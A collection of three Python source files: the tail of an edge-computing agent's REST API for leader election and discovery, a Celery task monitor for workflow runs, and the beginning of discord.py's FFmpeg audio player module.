ret = arearesilience.promotedToBackup(leaderIP=leaderIP) # TODO: get leaderIP from CIMI
if ret:
LOG.info('Successful promotion to Backup')
return {'imLeader': imLeader, 'imBackup': True}, 200
else:
LOG.warning('Unsuccessful promotion from Agent to Backup')
return {'imLeader': arearesilience.imLeader(), 'imBackup': arearesilience.imBackup()}, 403
elif role.lower() == 'agent':
# Bigger will be the fall....
if imLeader:
# You are such an incompetent, you're FIRED!
# Leader demotion
LOG.debug('Role change: Leader -> Agent')
arearesilience.stop()
# agentstart.switch(imLeader=False)
lightdiscovery.stopBeaconning()
lightdiscovery.startScanning()
CPARAMS.LEADER_FLAG = False
arearesilience = AreaResilience(cimi, policiesdistribution.LPP)
arearesilience.start(agentstart.deviceID)
return {'imLeader': False, 'imBackup': False}, 200
elif imBackup:
# Maybe we are gonna call you latter.... or not
# Backup demotion
LOG.debug('Role change: Backup -> Agent')
arearesilience.stop()
arearesilience = AreaResilience(cimi, policiesdistribution.LPP)
arearesilience.start(agentstart.deviceID)
return {'imLeader': False, 'imBackup': False}, 200
else:
# You're so tiny that I don't even care.
LOG.debug('Role change: Agent -> Agent')
return {'imLeader': False, 'imBackup': False}, 403
else:
# keikaku doori... Weird syntax maybe?
return {'imLeader': imLeader, 'imBackup': imBackup}, 404
@pl.route('/reelection')
class reelection(Resource):
"""Reelection of the Leader"""
@pl.doc('post_reelection')
@pl.expect(reelection_model)
# @pl.marshal_with(reelection_model, code=200) # Only for return if we want to follow the same schema
@pl.response(200, 'Reelection Successful')
@pl.response(401, 'The Agent is not authorized to trigger the reelection')
@pl.response(403, 'Reelection failed')
@pl.response(404, 'Device not found or IP not available')
def post(self):
"""Reelection of the Leader"""
found = False
deviceIP = ''
deviceID = api.payload['deviceID']
for device in cimi('topology', default=[]): # TODO: use real topology
if device.get('deviceID') == deviceID:
found = True
deviceIP = device.get('deviceIP')
break
if not arearesilience.imLeader():
LOG.error('Device is not a Leader, cannot perform a reelection in a non-leader device.')
return {'deviceID': deviceID, 'deviceIP': deviceIP}, 401
if not found:
LOG.error('Device {} not found in the topology'.format(deviceID))
return {'deviceID': deviceID, 'deviceIP': deviceIP}, 404
correct = LeaderReelection.reelection(arearesilience, deviceID, deviceIP)
if correct:
return {'deviceID': deviceID, 'deviceIP': deviceIP}, 200
else:
return {'deviceID': deviceID, 'deviceIP': deviceIP}, 403
@pl.route('/keepalive')
class keepalive(Resource):
"""Keepalive entrypoint"""
@pl.doc('post_keepalive')
@pl.expect(keepalive_model)
@pl.marshal_with(keepalive_reply_model, code=200)
@pl.response(200, 'Leader alive')
@pl.response(403, 'Agent not authorized (Not recognized as backup)')
@pl.response(405, 'Device is not a Leader')
def post(self):
"""Keepalive entrypoint for Leader"""
if not arearesilience.imLeader():
# It's not like I don't want you to send me messages or anything, b-baka!
return {'deviceID': agentstart.deviceID, 'backupPriority': arearesilience.PRIORITY_ON_FAILURE}, 405
correct, priority = arearesilience.receive_keepalive(api.payload['deviceID'])
LOG.debug('Device {} has sent a keepalive. Result correct: {}, Priority: {}'.format(api.payload['deviceID'],correct,priority))
if correct:
# Authorized
return {'deviceID': agentstart.deviceID, 'backupPriority': priority}, 200
else:
# Not Authorized
return {'deviceID': agentstart.deviceID, 'backupPriority': priority}, 403
@pl.route('/leaderinfo')
class leaderInfo(Resource): # TODO: Provisional, remove when possible
"""Leader and Backup information"""
@pl.doc('get_leaderinfo')
@pl.marshal_with(leader_info_model, code=200)
@pl.response(200, 'Leader and Backup Information')
def get(self):
"""Leader and Backup information"""
return {
'imLeader': arearesilience.imLeader(),
'imBackup': arearesilience.imBackup()
}, 200
@pl.route(URLS.END_POLICIESDISTR_RECV)
class policyDistr(Resource):
"""Policies Distribution Entrypoint"""
@pl.doc('post_policies')
@pl.expect(policies_distr_model)
@pl.response(200, 'Policies correctly received')
@pl.response(400, 'Message malformation')
def post(self):
"""Policies Distribution Reception"""
correct = policiesdistribution.receivePolicies(api.payload)
if correct:
return {'result':correct}, 200
else:
return 400
@pl.route(URLS.END_POLICIESDISTR_TRIGGER)
class policyTrigger(Resource):
"""Policies Distribution Send Trigger"""
@pl.doc('get_triggerpolicies')
@pl.response(200, 'Trigger accepted')
def get(self):
"""Policies Distribution Send Trigger"""
iplist = [item.get('deviceIP') for item in cimi('topology')]
policiesdistribution.distributePolicies(iplist)
return 200
@pl.route(URLS.END_POLICIESGET)
class policyGetCurrent(Resource):
"""Policies Distribution Get Current Policies"""
@pl.doc('get_currentpolicies')
@pl.response(200, 'Policies received')
@pl.marshal_with(policies_distr_model, code=200)
def get(self):
"""Policies Distribution Get Current Policies"""
return policiesdistribution.getPolicies(), 200
@ld.route(URLS.END_BEACONREPLY)
class beaconReply(Resource):
"""Beacon Reply"""
@ld.doc('post_beaconreply')
@ld.expect(beacon_reply_model)
@ld.response(200, 'Device added/modified on the topology')
@ld.response(400, 'Error on beacon reply message')
def post(self):
"""Beacon Reply"""
deviceIP = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
correct = lightdiscovery.recv_reply(api.payload, deviceIP)
if correct:
return '', 200
else:
return '', 400
# noinspection PyUnresolvedReferences
@ld.route('{}/<string:mode>/<string:operation>'.format(URLS.END_LDISCOVERY_CONTROL))
@ld.param('mode', description='LDiscovery mode (beacon/scan)')
@ld.param('operation', description='Operation on LDiscovery (start/stop)')
class ldiscoveryControl(Resource):
"""Control the LDiscovery Module"""
@ld.doc('get_control_ld')
@ld.response(200, 'Successful operation')
@ld.response(400, 'Error on operation')
@ld.response(404, 'Mode/Operation not found')
def get(self, mode, operation):
"""Control the LDiscovery Module"""
if mode.lower() == 'beacon':
# Beacon operation (Leader)
if operation.lower() == 'start':
# Start LDiscovery beaconning
correct = lightdiscovery.startBeaconning()
if correct:
return '', 200
else:
return '', 400
elif operation.lower() == 'stop':
correct = lightdiscovery.stopBeaconning()
if correct:
return '', 200
else:
return '', 400
else:
return '', 404
elif mode.lower() == 'scan':
# Scan operation (Agent)
if operation.lower() == 'start':
correct = lightdiscovery.startScanning()
if correct:
return '', 200
else:
return '', 400
elif operation.lower() == 'stop':
correct = lightdiscovery.stopScanning()
if correct:
return '', 200
else:
return '', 400
else:
return '', 404
else:
return '', 404
@ld.route(URLS.END_LDISCOVERY_TOPOLOGY)
class ldiscoveryTopology(Resource):
"""Get the current topology"""
@ld.doc('get_topology')
@ld.response(200, 'Topology Successful received')
def get(self):
return {'topology': lightdiscovery.get_topology()}, 200
# And da Main Program
def cimi(key, default=None):
value = default
if key == 'leader':
value = CPARAMS.LEADER_FLAG
elif key == 'topology':
value = []
try:
# for item in CPARAMS.TOPOLOGY_FLAG:
for item in lightdiscovery.get_topology():
i = {
'deviceID': item[0],
'deviceIP': item[1]
}
value.append(i)
except:
LOG.exception('Topology Environment variable format is not correct.')
value = []
elif key == 'disc_leaderIP':
value = lightdiscovery.leaderIP
if value is None:
value = default
return value
def initialization():
global arearesilience, agentstart, lightdiscovery
# 0. Waitting time
LOG.info('INIT: Wait {:.2f}s to start'.format(CPARAMS.TIME_WAIT_INIT))
sleep(CPARAMS.TIME_WAIT_INIT)
LOG.debug('INIT: Wake Me up Before You Go-Go ♫')
# 1. Area Resilience Module Creation
LOG.debug('Area Resilience submodule creation')
arearesilience = AreaResilience(cimi, policiesdistribution.LPP)
LOG.debug('Area Resilience created')
# 2. Leader Reelection Module Creation (None)
# 3. Agent Start Module Creation
LOG.debug('Agent Start submodule creation')
if CPARAMS.MF2C_FLAG:
agentstart = AgentStart(addr_pol=('127.0.0.1', '46050'),
addr_dis=('discovery', '46040'),
addr_cat=('resource-categorization', '46070'),
addr_id=('identification', '46060'))
else:
agentstart = AgentStart(addr_pol=('127.0.0.1', '46050'))
agentstart.deviceID = CPARAMS.DEVICEID_FLAG
if CPARAMS.LEADER_IP_FLAG is not None and len(CPARAMS.LEADER_IP_FLAG) != 0:
agentstart.leaderIP = CPARAMS.LEADER_IP_FLAG
LOG.debug('Agent Start created')
# 4. Light Discovery Module Creation
LOG.debug('Light Discovery submodule creation')
lightdiscovery = LightDiscovery(CPARAMS.BROADCAST_ADDR_FLAG,CPARAMS.DEVICEID_FLAG)
LOG.debug('Light discovery created')
return
def main():
LOG.info('API documentation page at: http://{}:{}/'.format('localhost', 46050))
app.run(debug=False, host='0.0.0.0', port=CPARAMS.POLICIES_PORT)
def debug():
sleep(10) # Give some time to the webservice
LOG.info('Starting LDiscovery...')
if CPARAMS.LEADER_FLAG:
r = requests.get(URLS.build_url_address('{}beacon/start'.format(URLS.URL_LDISCOVERY_CONTROL), portaddr=('127.0.0.1', CPARAMS.POLICIES_PORT)))
else:
r = requests.get(URLS.build_url_address('{}scan/start'.format(URLS.URL_LDISCOVERY_CONTROL), portaddr=('127.0.0.1', CPARAMS.POLICIES_PORT)))
LOG.info('LDiscovery started with status_code = {}'.format(r.status_code))
LOG.info('Starting Area Resilience...')
r = requests.get(URLS.build_url_address(URLS.URL_POLICIES, portaddr=('127.0.0.1', CPARAMS.POLICIES_PORT)))
LOG.debug('Area Resilience request result: {}'.format(r.json()))
LOG.debug('Stopping thread activity.')
return
if __name__ == '__main__':
initialization()
if CPARAMS.DEBUG_FLAG or CPARAMS.MF2C_FLAG:
t = Thread(target=debug, name='debug_init', daemon=True)
t.start()
main()
exit(0)
|
celery_task_monitor.py | """Celery task monitor, event handlers and related utility functions."""
from ast import literal_eval
from datetime import datetime
import logging
import os
import re
import requests
from shlex import quote
from threading import Thread
from time import sleep
from typing import (Dict, List, Optional)
from celery import Celery
from celery.events import Event
from celery.events.receiver import EventReceiver
from kombu.connection import Connection # noqa: F401
from pymongo import collection as Collection
import tes
import cwl_wes.database.db_utils as db_utils
# Get logger instance
logger = logging.getLogger(__name__)
# Set string time format
strf: str = '%Y-%m-%d %H:%M:%S.%f'
class TaskMonitor():
"""Celery task monitor."""
def __init__(
self,
celery_app: Celery,
collection: Collection,
tes_config: Dict[str, str],
timeout: float = 0,
authorization: bool = True,
) -> None:
"""Starts Celery task monitor daemon process."""
self.celery_app = celery_app
self.collection = collection
self.timeout = timeout
self.authorization = authorization
self.tes_config = tes_config
self.thread = Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
logger.debug('Celery task monitor daemon process started...')
def run(self) -> None:
"""Daemon process for Celery task monitor."""
while True:
try:
with self.celery_app.connection() as \
connection: # type: Connection
listener: EventReceiver = self.celery_app.events.Receiver(
connection,
handlers={
'task-received':
self.on_task_received,
'task-started':
self.on_task_started,
'task-failed':
self.on_task_failed,
'task-succeeded':
self.on_task_succeeded,
'task-tes-task-update':
self.on_task_tes_task_update,
}
)
listener.capture(limit=None, timeout=None, wakeup=True)
except KeyboardInterrupt as e:
logger.exception(
(
'Task monitor interrupted. Execution aborted. '
'Original error message: {type}: {msg}'
).format(
type=type(e).__name__,
msg=e,
)
)
raise SystemExit
except Exception as e:
logger.exception(
(
'Unknown error in task monitor occurred. Original '
'error message: {type}: {msg}'
).format(
type=type(e).__name__,
msg=e,
)
)
pass
# Sleep for specified interval
sleep(self.timeout)
def on_task_received(
self,
event: Event,
) -> None:
"""Event handler for received Celery tasks."""
if not event['name'] == 'tasks.run_workflow':
return None
# Parse subprocess inputs
try:
kwargs = literal_eval(event['kwargs'])
except Exception as e:
logger.exception(
(
"Field 'kwargs' in event message malformed. Original "
'error message: {type}: {msg}'
).format(
type=type(e).__name__,
msg=e,
)
)
pass
# Build command
if 'command_list' in kwargs:
if self.authorization:
kwargs['command_list'][3] = '<REDACTED>'
kwargs['command_list'][5] = '<REDACTED>'
command = ' '.join(
[quote(item) for item in kwargs['command_list']]
)
else:
command = 'N/A'
# Create dictionary for internal parameters
internal = dict()
internal['task_received'] = datetime.utcfromtimestamp(
event['timestamp']
)
internal['process_id_worker'] = event['pid']
internal['host'] = event['hostname']
# Update run document in database
try:
self.update_run_document(
event=event,
state='QUEUED',
internal=internal,
task_received=datetime.utcfromtimestamp(
event['timestamp']
).strftime(strf),
command=command,
utc_offset=event['utcoffset'],
max_retries=event['retries'],
expires=event['expires'],
)
except Exception as e:
logger.exception(
(
'Database error. Could not update log information for '
"task '{task}'. Original error message: {type}: {msg}"
).format(
task=event['uuid'],
type=type(e).__name__,
msg=e,
)
)
def on_task_started(
self,
event: Event,
) -> None:
"""Event handler for started Celery tasks."""
if not self.collection.find_one({'task_id': event['uuid']}):
return None
internal = dict()
internal['task_started'] = datetime.utcfromtimestamp(
event['timestamp']
)
# Update run document in database
try:
self.update_run_document(
event=event,
state='RUNNING',
internal=internal,
task_started=datetime.utcfromtimestamp(
event['timestamp']
).strftime(strf),
)
except Exception as e:
logger.exception(
(
'Database error. Could not update log information for '
"task '{task}'. Original error message: {type}: {msg}"
).format(
task=event['uuid'],
type=type(e).__name__,
msg=e,
)
)
def on_task_failed(
self,
event: Event,
) -> None:
"""Event handler for failed (system error) Celery tasks."""
if not self.collection.find_one({'task_id': event['uuid']}):
return None
# Create dictionary for internal parameters
internal = dict()
internal['task_finished'] = datetime.utcfromtimestamp(
event['timestamp']
)
internal['traceback'] = event['traceback']
# Update run document in databse
self.update_run_document(
event=event,
state='SYSTEM_ERROR',
internal=internal,
task_finished=datetime.utcfromtimestamp(
event['timestamp']
).strftime(strf),
exception=event['exception'],
)
def on_task_succeeded(
self,
event: Event,
) -> None:
"""Event handler for successful, failed and canceled Celery
tasks."""
if not self.collection.find_one({'task_id': event['uuid']}):
return None
# Parse subprocess results
try:
(returncode, log, tes_ids, token) = literal_eval(event['result'])
log_list=log
log = os.linesep.join(log)
except Exception as e:
logger.exception(
(
"Field 'result' in event message malformed. Original "
'error message: {type}: {msg}'
).format(
type=type(e).__name__,
msg=e,
)
)
pass
# Create dictionary for internal parameters
internal = dict()
internal['task_finished'] = datetime.utcfromtimestamp(
event['timestamp']
)
# Set final state to be set
document = self.collection.find_one(
filter={'task_id': event['uuid']},
projection={
'api.state': True,
'_id': False,
}
)
if document and document['api']['state'] == 'CANCELING':
state = 'CANCELED'
elif returncode:
state = 'EXECUTOR_ERROR'
else:
state = 'COMPLETE'
# Extract run outputs
#outputs = self.__cwl_tes_outputs_parser(log)
outputs = self.__cwl_tes_outputs_parser_list(log_list)
# Get task logs
task_logs = self.__get_tes_task_logs(
tes_ids=tes_ids,
token=token,
)
# Update run document in database
try:
self.update_run_document(
event=event,
state=state,
internal=internal,
outputs=outputs,
task_logs=task_logs,
task_finished=datetime.utcfromtimestamp(
event['timestamp']
).strftime(strf),
return_code=returncode,
stdout=log,
stderr='',
)
except Exception as e:
logger.exception(
(
'Database error. Could not update log information for '
"task '{task}'. Original error message: {type}: {msg}"
).format(
task=event['uuid'],
type=type(e).__name__,
msg=e,
)
)
pass
def on_task_tes_task_update(
self,
event: Event,
) -> None:
"""Event handler for TES task state changes."""
# If TES task is new, add task log to database
if not event['tes_state']:
tes_log = self.__get_tes_task_log(
tes_id=event['tes_id'],
token=event['token'],
)
try:
db_utils.append_to_tes_task_logs(
collection=self.collection,
task_id=event['uuid'],
tes_log=tes_log,
)
except Exception as e:
logger.exception(
(
'Database error. Could not update log information for '
"task '{task}'. Original error message: {type}: {msg}"
).format(
task=event['uuid'],
type=type(e).__name__,
msg=e,
)
)
pass
# Otherwise only update state
else:
try:
db_utils.update_tes_task_state(
collection=self.collection,
task_id=event['uuid'],
tes_id=event['tes_id'],
state=event['tes_state'],
)
logger.info(
(
"State of TES task '{tes_id}' of run with task ID "
"'{task_id}' changed to '{state}'."
).format(
task_id=event['uuid'],
tes_id=event['tes_id'],
state=event['tes_state'],
)
)
except Exception as e:
logger.exception(
(
'Database error. Could not update log information for '
"task '{task}'. Original error message: {type}: {msg}"
).format(
task=event['uuid'],
type=type(e).__name__,
msg=e,
)
)
pass
def update_run_document(
self,
event: Event,
state: Optional[str] = None,
internal: Optional[Dict] = None,
outputs: Optional[Dict] = None,
task_logs: Optional[List[Dict]] = None,
**run_log_params
):
"""Updates state, internal and run log parameters in database
document.
"""
# TODO: Minimize db ops; try to compile entire object & update once
# Update internal parameters
if internal:
document = db_utils.upsert_fields_in_root_object(
collection=self.collection,
task_id=event['uuid'],
root='internal',
**internal,
)
# Update outputs
if outputs:
document = db_utils.upsert_fields_in_root_object(
collection=self.collection,
task_id=event['uuid'],
root='api.outputs',
**outputs,
)
# Update task logs
if task_logs:
document = db_utils.upsert_fields_in_root_object(
collection=self.collection,
task_id=event['uuid'],
root='api',
task_logs=task_logs,
)
# Update run log parameters
if run_log_params:
document = db_utils.upsert_fields_in_root_object(
collection=self.collection,
task_id=event['uuid'],
root='api.run_log',
**run_log_params,
)
# Calculate queue, execution and run time
if document and document['internal']:
run_log = document['internal']
durations = dict()
if 'task_started' in run_log_params:
if 'task_started' in run_log and 'task_received' in run_log:
pass
durations['time_queue'] = (
run_log['task_started'] - run_log['task_received']
).total_seconds()
if 'task_finished' in run_log_params:
if 'task_finished' in run_log and 'task_started' in run_log:
pass
durations['time_execution'] = (
run_log['task_finished'] - run_log['task_started']
).total_seconds()
if 'task_finished' in run_log and 'task_received' in run_log:
pass
durations['time_total'] = (
run_log['task_finished'] - run_log['task_received']
).total_seconds()
if durations:
document = db_utils.upsert_fields_in_root_object(
collection=self.collection,
task_id=event['uuid'],
root='api.run_log',
**durations,
)
# Update state
if state:
try:
document = db_utils.update_run_state(
collection=self.collection,
task_id=event['uuid'],
state=state,
)
except Exception:
raise
# Log info message
if document:
logger.info(
(
"State of run '{run_id}' (task id: '{task_id}') changed "
"to '{state}'."
).format(
run_id=document['run_id'],
task_id=event['uuid'],
state=state,
)
)
return document
@staticmethod
def __cwl_tes_outputs_parser(log: str) -> Dict:
"""Parses outputs from cwl-tes log."""
# Find outputs object in log string
re_outputs = re.compile(
r'(^\{$\n^ {4}"\S+": [\[\{]$\n(^ {4,}.*$\n)*^ {4}[\]\}]$\n^\}$\n)',
re.MULTILINE
)
m = re_outputs.search(log)
if m:
return literal_eval(m.group(1))
else:
return dict()
@staticmethod
def __cwl_tes_outputs_parser_list(log: List) -> Dict:
"""This function parses outputs from the cwl-tes log"""
"""The outputs JSON starts at the line before last in the logs"""
"""So unless the outputs are empty ({}), parse upward,"""
"""until you find the beginning of the JSON containing the outputs"""
indices=range(len(log)-1,-1,-1)
start=-1
end=-1
for index in indices:
if log[index].rstrip()=='{}':
return dict()
elif log[index].rstrip()=='}':
end=index
break
# No valid JSON was found and the previous loop
# reached the end of the log
if end==0:
return dict()
indices=range(end-1,-1,-1)
for index in indices:
if log[index].rstrip()=='{':
start=index
break
json=os.linesep.join(log[start:end+1])
try:
return literal_eval(json)
except ValueError as verr:
logger.exception(
"ValueError when evaluation JSON: '%s'. Original error message: %s" % \
(json, verr)
)
return dict()
except SyntaxError as serr:
logger.exception(
"SyntaxError when evaluation JSON: '%s'. Original error message: %s" % \
(json, serr)
)
return dict()
def __get_tes_task_logs(
self,
tes_ids: List = list(),
token: Optional[str] = None,
) -> List[Dict]:
"""Gets multiple task logs from TES instance."""
task_logs = list()
for tes_id in tes_ids:
task_logs.append(
self.__get_tes_task_log(
tes_id=tes_id,
token=token,
)
)
return task_logs
def __get_tes_task_log(
self,
tes_id: str,
token: Optional[str] = None,
) -> Dict:
"""Gets task log from TES instance."""
tes_client = tes.HTTPClient(
url=self.tes_config['url'],
timeout=self.tes_config['timeout'],
token=token,
)
task_log = {}
try:
task_log = tes_client.get_task(
task_id=tes_id,
view=self.tes_config['query_params'],
).as_dict()
except Exception as e:
# TODO: handle more robustly: only 400/Bad Request is okay;
# TODO: other errors (e.g. 500) should be dealt with
logger.warning(
"Could not obtain task log. Setting default. Original error "
f"message: {type(e).__name__}: {e}"
)
task_log = {}
logger.debug(f'Task log: {task_log}')
return task_log
|
player.py | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import (
Any,
Awaitable,
Callable,
Generic,
IO,
Optional,
TYPE_CHECKING,
Tuple,
Type,
TypeVar,
Union,
)
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
